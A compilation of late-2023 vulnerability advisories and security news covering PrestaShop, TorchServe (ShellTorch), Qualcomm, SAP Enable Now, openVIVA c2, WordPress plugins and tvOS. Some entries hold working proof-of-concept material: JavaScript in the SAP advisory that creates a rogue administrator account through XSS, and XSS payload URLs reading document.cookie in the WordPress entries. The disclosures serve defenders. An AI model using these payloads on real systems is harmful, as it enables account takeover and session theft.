Theme volty tvcmspaymenticon up to v4.0.1 was discovered to contain a SQL injection vulnerability via the component /tvcmspaymenticon/ajax.php?action=update_position&recordsArray.

**IMPORTANT NOTICE**: DO NOT REPORT VULNERABILITIES SOLELY TO THE AUTHOR OR MARKETPLACE.

We urge you to report any vulnerabilities directly to us. Our mission is to ensure the safety and security of the PrestaShop ecosystem. Unfortunately, many module developers may not always recognize or acknowledge the vulnerabilities in their code, whether due to lack of awareness, or inability to properly evaluate the associated risk, or other reasons.

Given the rise in professional cybercrime networks actively seeking out these vulnerabilities, it's crucial that any potential threats are promptly addressed and the community is informed. The most effective method to do this is by publishing a CVE, like the one provided below.

Should you discover any vulnerabilities, **please report them to us at: report\[@\]security-presta.org**.

Every vulnerability report helps make the community more secure, and we are profoundly grateful for any information shared with us.

In the module “Theme Volty CMS Payment Icon” (tvcmspaymenticon) up to version 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39645
*   **Published at**: 2023-09-26
*   **Platform**: PrestaShop
*   **Product**: tvcmspaymenticon
*   **Impacted release**: <= 4.0.1 (4.0.2 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The script ajax.php has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.1**

    --- 4.0.1/tvcmspaymenticon/ajax.php
    +++ 4.0.2/tvcmspaymenticon/ajax.php
            $update_position[] = 'UPDATE 
                                            `' . _DB_PREFIX_ . 'tvcmspaymenticon` 
                                        SET
    -                                        `position` = ' . $pos . '
    +                                        `position` = ' . (int) $pos . '
                                        WHERE
    -                                        `id_tvcmspaymenticon` = ' . $value . ';';
    +                                        `id_tvcmspaymenticon` = ' . (int) $value . ';';
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmspaymenticon**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

Author provide a patch which still own all criticals vulnerabilities

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-09-26

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

**DISCLAIMER:** _The French Association Friends Of Presta (FOP) acts as an intermediary to help hosting this advisory. While we strive to ensure the information and advice provided are accurate, FOP cannot be held liable for any consequences arising from reported vulnerabilities or any subsequent actions taken._

CVE-2023-39645: [CVE-2023-39645] Improper neutralization of SQL parameter in Theme Volty CMS Payment Icon module for PrestaShop

By Waqas
Dubbed ShellTorch by researchers; these PyTorch vulnerabilities are troubling for the artificial intelligence (AI) and machine learning (ML) community.
This is a post from HackRead.com Read the original post: ShellTorch Attack Exposes Millions of PyTorch Systems to RCE Vulnerabilities

Amongst various cybersecurity threats, the ShellTorch attack exposes the PyTorch Model Server to remote code execution.

The cybersecurity researchers at the Oligo Security research team have unveiled a series of critical vulnerabilities within the PyTorch Model Server, also known as **TorchServe**.

Dubbed ShellTorch by researchers; these vulnerabilities are troubling for the artificial intelligence (AI) and machine learning (ML) community, as they open the door for remote code execution and potential server takeovers.

PyTorch is a machine learning framework, based on the Torch library, and is well known for its versatile applications encompassing computer vision, natural language processing, and more. Initially **created by Meta AI**, this influential framework has now found its home at the Linux Foundation. PyTorch is a foundational component in the ever-evolving domain of AI and machine learning technologies.

****Massive Impact on High-Profile Organizations****

Oligo Security’s research has identified thousands of vulnerable instances of TorchServe publicly exposed on the internet, with some belonging to the world’s largest and most prominent organizations.

This discovery leaves these organizations susceptible to unauthorized access and the insertion of malicious AI models, posing a significant threat to millions of services and their end-users.

****PyTorch’s Dominance Draws Attackers****

PyTorch, a powerhouse in **machine learning** research and widely adopted in the AI industry, has attracted the attention of threat actors. Oligo Security’s research reveals that these new critical vulnerabilities allow remote code execution without any authentication, putting PyTorch-based systems at immediate risk.

****The TorchServe Ecosystem****

TorchServe, a popular model-serving framework for PyTorch, enjoys broad usage across the AI landscape. Maintained by Meta and Amazon, this open-source library boasts over 30,000 PyPi downloads monthly and more than a million DockerHub pulls.

Its commercial users include industry giants like Walmart, Amazon, OpenAI, Tesla, Azure, Google Cloud, Intel, and many more. Furthermore, TorchServe serves as the foundation for projects like KubeFlow, MLFlow, and AWS Neuron, and is offered as a managed service by leading cloud providers.

****Revealing the Vulnerabilities****

Oligo Security’s findings highlight vulnerabilities affecting all TorchServe versions prior to 0.8.2. These vulnerabilities, when exploited in sequence, result in remote code execution, granting attackers full control over victims’ servers and networks and enabling the exfiltration of sensitive data.

****The Anatomy of a ShellTorch Attack****

To comprehend the gravity of the situation, it’s crucial to understand how these vulnerabilities combine to create the ShellTorch attack:

**Vulnerability #1 – Abusing the Management Console: Unauthenticated Management Interface API Misconfiguration**

TorchServe exposes a management API with a misconfiguration vulnerability that allows external access. This misconfiguration, seemingly innocuous in the default configuration, leaves the door open for malicious actors.

**Vulnerability #2 – Malicious Model Injection: Remote Server-Side Request Forgery (SSRF) that Leads to Remote Code Execution**

TorchServe’s default configuration accepts all domains as valid URLs, leading to an SSRF vulnerability. Attackers can exploit this to upload a malicious model, resulting in arbitrary code execution.

**Vulnerability #3 – Exploiting an Insecure Use of Open Source Library: Java Deserialization Remote Code Execution**

A misuse of the SnakeYAML library in TorchServe opens a door for attackers to trigger an unsafe deserialization attack, enabling code execution on the target machine.

****The Result: Total Takeover****

These vulnerabilities collectively empower attackers to execute code remotely with high privileges, bypassing authentication. Once inside, attackers can compromise TorchServe servers globally, potentially affecting tens of thousands of IP addresses.

The attack flow

****Security Risks in AI: Impacts and Implications****

The integration of open-source tools into AI production environments creates a delicate balance between innovation and vulnerability. Oligo’s findings echo concerns raised in the recent OWASP Top 10 for LLM Applications, touching on supply chain vulnerabilities, model theft, and model injection.

****Updates by Amazon and META****

According to Oligo Security’s **report**, on October 2nd 2023, both Amazon and Meta took swift actions in response to the ShellTorch vulnerabilities. Amazon proactively issued a security advisory for its users, highlighting the critical nature of the threat. Simultaneously, Meta acted by promptly addressing the default management API misconfiguration, implementing measures to mitigate this vulnerability within the PyTorch ecosystem.

****Mitigation: Protecting Against ShellTorch Attacks****

To safeguard TorchServe systems from ShellTorch attacks, three key steps are essential:

1.  **Update to Version 0.8.2 or Above:** While this update adds a warning about the SSRF vulnerability, it is a critical first step in mitigating the risk.
2.  **Configure the Management Console:** Adjust the configuration to ensure that the management console is accessible only from trusted sources, preventing remote access by attackers.
3.  **Control Model Fetching:** Limit TorchServe’s ability to fetch models from trusted domains only, preventing malicious model injections.

In conclusion, the discovery of these vulnerabilities highlights cybersecurity threats in the **AI and machine learning sector**. As the industry continues to grow at a rapid pace, organizations must remain vigilant and proactive in addressing potential security risks in their AI infrastructure.

1.  mLearning – Future of On-The-Go Dynamic Training Programs
2.  The Role of DevOps in Streamlining Cloud Migration Processes
3.  Using GenAI in Your Business? Here Is What You Need To Know
4.  Mozilla Rushes to Fix Critical Vulnerability in Firefox, Thunderbird
5.  WinRAR users update your software as 0-day vulnerability is found

ShellTorch Attack Exposes Millions of PyTorch Systems to RCE Vulnerabilities

Chipmaker Qualcomm has released security updates to address 17 vulnerabilities in various components, while warning that three other zero-days have come under active exploitation.
Of the 17 flaws, three are rated Critical, 13 are rated High, and one is rated Medium in severity.
"There are indications from Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107,

Chipmaker Qualcomm has released security updates to address 17 vulnerabilities in various components, while warning that three other zero-days have come under active exploitation.

Of the 17 flaws, three are rated Critical, 13 are rated High, and one is rated Medium in severity.

"There are indications from Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107, CVE-2022-22071, and CVE-2023-33063 may be under limited, targeted exploitation," the semiconductor company said in an advisory.

"Patches for the issues affecting Adreno GPU and Compute DSP drivers have been made available, and OEMs have been notified with a strong recommendation to deploy security updates as soon as possible."

CVE-2022-22071 (CVSS score: 8.4), described as a use-after-free in Automotive OS Platform, was originally patched by the company as part of its May 2022 updates.

While additional specifics about the remaining other flaws are expected to be made public in December 2023, the disclosure comes the same day Arm shipped patches for a security flaw in the Mali GPU Kernel Driver (CVE-2023-4211) that has also come under limited, targeted exploitation.

Qualcomm's October 2023 updates also address three critical issues, although there is no evidence that they have been abused in the wild -

*   **CVE-2023-24855** (CVSS score: 9.8) - Memory corruption in Modem while processing security related configuration before AS Security Exchange.
*   **CVE-2023-28540** (CVSS score: 9.1) - Cryptographic issue in Data Modem due to improper authentication during TLS handshake.
*   **CVE-2023-33028** (CVSS score: 9.8) - Memory corruption in WLAN Firmware while doing a memory copy of pmk cache.

Users are advised to apply updates from original equipment manufacturers (OEMs) as soon as they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Qualcomm Releases Patch for 3 new Zero-Days Under Active Exploitation

Cybersecurity researchers have disclosed multiple critical security flaws in the TorchServe tool for serving and scaling PyTorch models that could be chained to achieve remote code execution on affected systems.
Israel-based runtime application security company Oligo, which made the discovery, has coined the vulnerabilities ShellTorch.
"These vulnerabilities [...] can lead to a full chain Remote

Artificial Intelligence / Cyber Threat

Cybersecurity researchers have disclosed multiple critical security flaws in the TorchServe tool for serving and scaling PyTorch models that could be chained to achieve remote code execution on affected systems.

Israel-based runtime application security company Oligo, which made the discovery, has coined the vulnerabilities **ShellTorch**.

"These vulnerabilities \[...\] can lead to a full chain Remote Code Execution (RCE), leaving countless thousands of services and end-users — including some of the world's largest companies — open to unauthorized access and insertion of malicious AI models, and potentially a full server takeover," security researchers Idan Levcovich, Guy Kaplan, and Gal Elbaz said.

The list of flaws, which have been addressed in version 0.8.2, is as follows -

*   No CVE - Unauthenticated Management Interface API Misconfiguration (0.0.0.0)
*   **CVE-2023-43654** (CVSS score: 7.2) - A remote server-side request forgery (SSRF) that leads to remote code execution.
*   **CVE-2022-1471** (CVSS score: 9.9) - Use of an insecure version of the SnakeYAML open-source library that allows for unsafe deserialization of Java objects

Successful exploitation of the aforementioned flaws could allow an attacker to send a request to upload a malicious model from an actor-controlled address, leading to arbitrary code execution.

Put in other words, an attacker who can remotely access the management server can also upload a malicious model, which enables code execution without requiring any authentication on any default TorchServe server.

Even more troublingly, the shortcomings could be chained with CVE-2022-1471 to pave the way for code execution and full takeover of exposed instances.

"AI models can include a YAML file to declare their desired configuration, so by uploading a model with a maliciously crafted YAML file, we were able to trigger an unsafe deserialization attack that resulted in code execution on the machine," the researchers said.

The severity of the issues has prompted Amazon Web Services (AWS) to issue an advisory urging customers using PyTorch inference Deep Learning Containers (DLC) 1.13.1, 2.0.0, or 2.0.1 in EC2, EKS, or ECS released prior to September 11, 2023, update to TorchServe version 0.8.2.

"Using the privileges granted by these vulnerabilities, it is possible to view, modify, steal, and delete AI models and sensitive data flowing into and from the target TorchServe server," the researchers said.

"Making these vulnerabilities even more dangerous: when an attacker exploits the model serving server, they can access and alter sensitive data flowing in and out from the target TorchServe server, harming the trust and credibility of the application."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Warning: PyTorch Models Vulnerable to Remote Code Execution via ShellTorch

This vulnerability allows an authenticated attacker to upload malicious files by bypassing the restrictions of the upload functionality, compromising the entire device.

Affected Resources

ET-7060, version 3.00.

Description

INCIBE has coordinated the publication of 1 vulnerability in ICP DAS ET-7060, an ethernet module, which has been discovered by Joel Serna Moreno, from Titanium Industrial Security team.

This vulnerability has been assigned the following code, CVSS v3.1 base score, CVSS vector string, and CWE vulnerability type:

*   **CVE-2023-4817**: CVSS v3.1: 7,2 | CVSS: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | CWE-434.

Solution

There is no reported solution at this time.

Detail

**CVE-2023-4817**: unrestricted file upload vulnerability in ICP DAS ET-7060, affecting version 3.00. This vulnerability allows an authenticated attacker to upload malicious files by bypassing the restrictions of the upload functionality, compromising the entire device.

CVE-2023-4817: Unrestricted File Upload Vulnerability Icp Das Et 7060 | INCIBE-CERT

SAP Enable Now Manager version 10.6.5 Build 2804 Cloud Edition suffers from cross site request forgery, cross site scripting, and open redirection vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20230927-0 >=======================================================================               title: Multiple Vulnerabilities             product: SAP® Enable Now Manager  vulnerable version: 10.6.5 (Build 2804) Cloud Edition       fixed version: May 2023 Release          CVE number: N/A (cloud)              impact: high            homepage: https://www.sap.com/about.html               found: 2022-10-21                  by: Paul Serban (Eviden)                      Fabian Hagg (Office Vienna)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"SAP Enable Now solution provides advanced in-application help andtraining capabilities helping you to improve productivity and useradoption, as well as to increase satisfaction of the end-user experience.Create, maintain, and deliver in-application help, learning materials,and documentation content easily."Source: https://www.sapstore.com/solutions/41243/SAP-Enable-NowBusiness recommendation:------------------------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.SEC Consult recommends to perform a thorough security review conducted bysecurity professionals to identify and resolve potential further criticalsecurity issues.Vulnerability overview/description:-----------------------------------Multiple vulnerabilities were identified that could be chained together inorder to allow a remote, unauthenticated attacker to create new administrativeuser accounts by tricking the victim to click on a malicious link or visita malicious website prepared by the attacker.1) Open Redirect/URL Redirection VulnerabilityThe file download feature of the application contains an unvalidatedparameter value that exposes it to an open redirect vulnerability. Anattacker can create a malicious URL which would redirect the victim toa malicious site, for example, a phishing site convincing the victimto login once again.2) Reflected Cross Site Scripting (XSS)A reflected XSS vulnerability was found affecting the same parameter asused in 1). Due to insufficient input validation and output encoding, anattacker can inject arbitrary HTML or JavaScript code into the generatedserver response, executing it in the browser of the victim. The vulnerability,can be exploited, for example, to create new administrative user accountsin the application, thereby fully compromising the application. Any CSRFprotection can be bypassed by means of this vulnerability.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo implementation of CSRF protection was detected in the application.Using this vulnerability, an attacker can issue requests in the contextof administrative user sessions. This includes critical state changingactions such as user creation or role assignment. Note that in thetest environment the option 'Supported Functions' was set to value'DISABLE-CSRF-PROTECTION' in the server settings feature of the application.Certain configurations require this setting to be enabled, e.g. to allowthe SEN Workflow Approver extension to submit the data on behalf of thelogged-in user to the SAP Enable Now Manager. Without this parameter,the extension will only be able to read the content and workflow information)This indicates that there is an insecure feature which allows the protectionmechanism to be disabled globally. It could not be clarified if this is thedefault setting. In any case, the function should still be enhanced to protectcritical actions such as functions used in user management or role/permissionmanagement even if the mechanism is disabled by configuration.Proof of concept:-----------------1) Open Redirect/URL Redirection VulnerabilityThe public endpoint /resources/open_file.html is vulnerable to anopen redirect via GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.comAfter browsing to the above link, the victim gets redirected towww.sec-consult.com in a new browser window opened by the embeddedcall of function window.open(). Note that both attacker and victimdo not have to be authenticated for successful exploitation.2) Reflected Cross-Site Scripting (XSS)The public endpoint /resources/open_file.html is affected by an XSSvulnerability in GET parameter 'info'. To verify this vulnerability,it is sufficient to open the following URL in a web browser.https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain)After browsing to the above link, the domain property returns thedomain name of the server it was loaded from an alert window withinthe browser of the victim. This proves the successful execution of theinjected JavaScript code. In fact, any kind of JavaScript code couldbe injected by the attacker. Note that both attacker and victim donot have to be authenticated for successful exploitation.3) Insufficient Cross-Site Request Forgery (CSRF) ProtectionNo CSRF protection can be observed in POST requests sent between theclient and server. This includes at least the functions "task creation","user creation", "permission assignment" and "role/group assignment". Notethat this vulnerability appears to only affect systems where the CSRF protectionis disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION'in the server settings. Although this setting can be reverted, it is advisedto have the protection enabled for critical operations such as user creationor permission assignment at any time (also when the option is set).Several of the vulnerabilities above can be chained together by anunauthenticated attacker. Considering the types of vulnerabilities,there are multiple exploitation scenarios. In our example we willcreate a link that, when clicked by an administrator victim, willcreate a new admin account. For this attack to work, we first needto gather some information. To create an account, we need to know twoimportant values: the OU and the UID. The OU represents the OrganizationalUnit unique identifier. The UID here represents the unique Group IDof our target group where we want our new user to be added. Performinga simple GET request to endpoint /self/group, both values can beobtained. The following listing shows the server response.------------------------------------------------------------------------------------------------HTTP/1.1 200Cache-Control: no-cache, no-store, must-revalidateExpires: 0Vary: OriginSet-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly;Content-Type: text/json;charset=UTF-8Server: SAPConnection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadContent-Length: 396{"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086","ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid":"G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU10C ","active":true}]}}------------------------------------------------------------------------------------------------Finally, in order for the attack to succeed, the attacker needsthe victim (logged in as administrator) to do first a request onthe above endpoint, then a POST request on the endpoint /!/userto actually create the new user account with the administratorrole assigned using the values taken from the previous response.These interactions can be scripted using the following ten linesof JavaScript code.------------------------------------------------------------------------------------------------var req1 = new XMLHttpRequest();req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false);req1.withCredentials = true;req1.send();var obj = JSON.parse(req1.responseText).response;for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}};var req2 = new XMLHttpRequest();req2.open('POST',"https://example.enable-now.cloud.sap/!/user",false);req2.withCredentials = true;req2.send(JSON.stringify({"user":{"auth_user":"sapmatt","firstname":"SEC","lastname":"Consult","email":"","passwd":"sappass","role":[uid],"ou":ou}}));------------------------------------------------------------------------------------------------We can base64-encode this payload and pass it to the Javascript eval(atob())function using the XSS vulnerability in the file download feature (seen in 2.).The link could then be shortened to enhance the likelihood of successfulexploitation. This can be achieved, for example, by leveraging the Open Redirectvulnerability (seen in 1.) to redirect the victim to an attacker-controlledwebsite and trigger the above payload, making it an attack more likely tosucceed. If the victim is logged into the application and is part ofthe Administrator group, when they click on this link, a new adminaccount will be instantly created. The attacker then can log in and hasfull control over the application.Vulnerable / tested versions:-----------------------------The following versions of the software were found to be vulnerable during our tests:- SAP Enable Now Manager Version: 10.6.5 (Build 2804) - Cloud Edition (~October 2022)Vendor contact timeline:------------------------2022-11-08: Contacting vendor via secure@sap.com2022-11-10: Vendor requested screenshots and steps to reproduce2022-11-10: Informed vendor the previously provided POC contains the steps to reproduce             and screenshots weren't available at that time2022-11-10: Vendor confirmed issues are under review2022-11-18: Contacted vendor to request an update2022-11-18: Vendor confirmed issues are still under review2022-12-01: Vendor reached back to confirm a Security Incident ticket was opened to             the Engineering Team2023-02-02: Contacted vendor to request an update2023-02-03: Vendor confirmed that engineering had fixes ready and waiting on a             release schedule.2023-02-07: Vendor confirmed fix was deployed to production for ticket no #22801965642023-04-14: Contacted vendor to request update on ticket no #2280196563 fix2023-04-17: Vendor mentioned that the fix is scheduled to be deployed in May release2023-05-08: Vendor confirmed fix was deployed to production for 22801965632023-09-27: Public release of security advisory.Solution:---------Due to the Cloud Edition being affected, the vendor automatically pusheda fix in the production environment in the May 2023 Release.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF P. Serban, F. Hagg / @2023

SAP Enable Now Manager 10.6.5 Build 2804 Cloud Edition CSRF / XSS / Redirect

openVIVA c2 suffers from a persistent cross site scripting vulnerability. Versions prior to 20220801 are affected.

SEC Consult Vulnerability Lab Security Advisory < 20230925-0 >  
=======================================================================  
               title: Stored Cross-Site Scripting  
             product: mb Support broker management solution openVIVA c2  
  vulnerable version: <20220801  
       fixed version: =>20220801  
          CVE number: CVE-2022-39172  
              impact: Medium  
            homepage: https://mbsupport.de  
               found: 2022-03-16  
                  by: Daniel Hirschberger (Office Bochum)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com  
=======================================================================

Vendor description:  
-------------------  
"Support small and medium-sized companies as well as large corporate customers  
with just one software. Sales , inventory management , billing , e-mail and  
much more - with openVIVA c2 you get everything in one application. Without  
system disruption and in one database, you can do all the work of an insurance  
broker with one piece of software.

Connect brokers, intermediaries, insurers and customers directly with our  
self-service portals . Strengthen your customer relationships and work more  
efficiently yourself.

mb Support offers portals for intermediaries as well as industrial and  
commercial customers and tailor-made portal solutions for insurers, brokers and  
private customers."

Source: https://mbsupport.de/

Business recommendation:  
------------------------  
The vendor provides an updated version to their customers.

An in-depth security analysis performed by security professionals is  
highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting (CVE-2022-39172)  
An authenticated attacker with privileges of the role 'user' can create a new  
'Vorgang' (Process). The field 'Name' is not sanitized and enables an attacker  
to perform a stored XSS attack. Additionally, the field 'Hauptverantwortlicher'  
(persons mainly responsible) can be used to assign this 'Vorgang' to another user  
who will receive it in his overview list. This results in a targeted stored  
XSS attack.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting (CVE-2022-39172)  
The application is developed on top of Oracle Apex  
(https://apex.oracle.com/en/) which provides several security features to  
developers. Two of those are request replay protection and parameter  
checksumming which make it hard to develop a PoC which only consists of  
requests and responses. Therefore this PoC will be a textual description of the  
required steps and supplemented with pictures. Additionally the library  
'AlertifyJS' is used, which changes the appearance of alert popups which  
can be confusing if you are used to the standard alert popups.

To execute the attack the following steps have to be performed:  
1. Log in to openVIVA c2  
2. Go to 'mein openVIVA' (my openVIVA)  
3. Click on 'Vorgangszuordnung' (Process Assignment)  
4. Click on 'Neuen Vorgang starten' (Start new Process)  
5. In the new form enter the XSS payload into the 'Name' field, for example  
    "<script>alert('XSS')</script>"  
6. Choose your victim as 'Hauptverantwortlicher' (persons mainly responsible)  
7. Click on the three dots  
8. Click on 'Speichern' (save)

The victim now has a new 'Vorgang' in his inbox. If the 'Vorgänge' menu is clicked,  
the victim is redirected to the list of assigned 'Vorgänge'. Because our payload  
is in the name field it is executed as soon as the list of processes is loaded.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* openVIVA c2 20220101

Vendor contact timeline:  
------------------------  
2022-03-30: Contacting vendor through email followed by a telephone call,  
             sent the advisory  
2022-04-20: Asking for status update  
2022-04-22: Patch release is planned for August  
2022-07-26: Statuscall: Patch exists, advisory release delayed until  
             rollout to all customers is complete (~ August 2023(!))  
2023-09-18: Asking for a status update and patch download information.  
             Vendor response: no public link available; few customers  
             still have no patch.  
2023-09-25: Release of security advisory

Solution:  
---------  
Upgrade to version 2022-08-01 or later. The vendor has no public  
download link available as all customers will be patched according  
to their maintenance contract.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult? Send us your application  
https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Daniel Hirschberger / @2023

openVIVA c2 20220101 Cross Site Scripting

WordPress Contact Form Generator plugin version 2.5.5 suffers from a cross site scripting vulnerability.

    # Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting# Date: 03-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-generator/# Vendor Homepage: https://www.creative-solutions.net/# Version: 2.5.5 # Tested on: Windows, Linux# CVE: CVE-2023-37988# Product DescriptionContact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref: https://wordpress.org/plugins/contact-form-generator/# Vulnerability overview:The Wordpress plugins Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users.# Proof of Concept:Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id=Affected Parameters: idXSS Payload: "><script>alert(document.cookie)</script>xhttp://example.com/wp-admin/admin.php?page=cfg_fields&act=edit&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ex# RecommendationUpgrade to version 2.6.0

WordPress Contact Form Generator 2.5.5 Cross Site Scripting

WordPress KiviCard plugin version 3.2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: WP Plugins KiviCare 3.2.0 - Reflected Cross-Site Scripting# Date: 03-10-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/# Vendor Homepage: https://kivicare.io/# Version: 3.2.0# Tested on: Windows, Linux# CVE: CVE-2023-2624# Product DescriptionKiviCare is the most affordable self-hosted clinic and patient management system based on the WordPress platform. Set up your online clinic in no time. Ref: https://kivicare.io/# Vulnerability overview:The Wordpress plugins KiviCare - Clinic & Patient Management System (EHR) <= 3.2.0 is vulnerable to reflected cross-site scripting via the filterType parameter in the get weekly appointment function. This vulnerability could allow a malicious actor to inject malicious scripts.# Proof of Concept:Affected Endpoint: /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=Affected Parameters: filterTypeXSS Payload: <img src=x onerror=alert(document.cookie)>http://192.168.56.115/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_weekly_appointment&filterType=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E# RecommendationUpgrade to version 3.2.1

WordPress KiviCare 3.2.0 Cross Site Scripting

Apple Security Advisory 09-26-2023-9 - tvOS 17 addresses bypass, code execution, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-9 tvOS 17

tvOS 17 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213936.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Airport  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved redaction  
of sensitive information.  
CVE-2023-40384: Adam M.

App Store  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote attacker may be able to break out of Web Content  
sandbox  
